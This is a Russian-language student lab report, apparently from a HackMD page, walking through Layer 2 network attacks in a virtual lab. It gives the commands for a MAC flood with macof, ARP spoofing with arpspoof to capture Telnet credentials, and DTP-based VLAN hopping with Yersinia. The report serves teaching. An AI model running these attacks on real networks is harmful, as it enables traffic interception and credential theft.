###### tags: `Network` # Отчет по заданиям к практической работе №2. L2. Основные атаки на L2: ### 1) Провести атаки на канальном уровне модели OSI (L2). #### Часть 1. Переполнение таблицы коммутации. | 1. Установим на `Kali linux` необходимую утилиту. | | :----------------------------------------- | |`apt update`| |`apt install dsniff -y`| || || | 2. Включим атаку и через несколько секунд остановим её с помощью `Ctrl+C`. | | :----------------------------------------- | |`macof`| | | | 3. Увидим, что таблица коммутации `Switch7` переполнена. | | :-----------------------------------------| |Таблица коммутации до "флуда"| || |Таблица после до "флуда"| || | 5. Сам коммутатор начал испытывать проблемы во время атаки. | | :-----------------------------------------| #### Часть 2. Arp-Spoofing. |1. Установим на `Win7 Telnet`.| | :-----------------------------------------| || |2. Проверим, может ли `Win7` подключаться по `Telnet` к `Switch7`.| | :-----------------------------------------| |`telnet 192.168.1.100`| || || || |3. Настроим `Kali` для атаки. Изменим параметры маршрутизации.| | :-----------------------------------------| |`nano /etc/sysctf.conf`| || || |Применим изменения.| |`sysctl -p /etc/sysctl.conf`| || |4. Начнём атаку.| | :-----------------------------------------| |`arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100`| || |5. Обнаруживаем `Telnet`-трафик и аутентификационные данные пользователя.| | :-----------------------------------------| || |`Follow - TCP Stream`| || #### Часть 3. VLAN hopping. |1. Поместим `Win10` в `Vlan10`.| | :-----------------------------------------| |`int e1/2`| |`switchport mode access`| |`switchport access vlan 10`| || |2. Сконфигурируем `Trunk-port` на `Switch7`.| | :-----------------------------------------| |`int e0/0`| |`switchport trunk encapsulation dot1q`| |`switchport mode trunk`| || |3. Настроим на `Switch9` интерфейсы `е0/0`, `e0/1`, `e0/2` в `Trunk`.| | :-----------------------------------------| || |4. Настроим на роутере шлюз для `Vlan 10`.| | :-----------------------------------------| |`int e0/1.10`| |`encapsulation dot1q 10`| |`ip address 192.168.10.1 255.255.255.0`| || |5. Установим `Yersinia`.| | :-----------------------------------------| |`apt install yersinia -y`| || |6. Запустим `Yersinia`.| | :-----------------------------------------| |`yersinia -G`| || |7. Проведем атаку на протокол `DTP`.| | :-----------------------------------------| || || |8. Подготовим интерфейсы `Kali`.| | :-----------------------------------------| |`modprobe 8021q`| |`vconfig add eth0 10`| |`ifconfig eth0.10 up`| || || || |9. С помощью `Wireshark` проанализируем исходящий трафик от `Kali` и найдем трафик с `Vlan ID=10`.| | :-----------------------------------------| ||
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up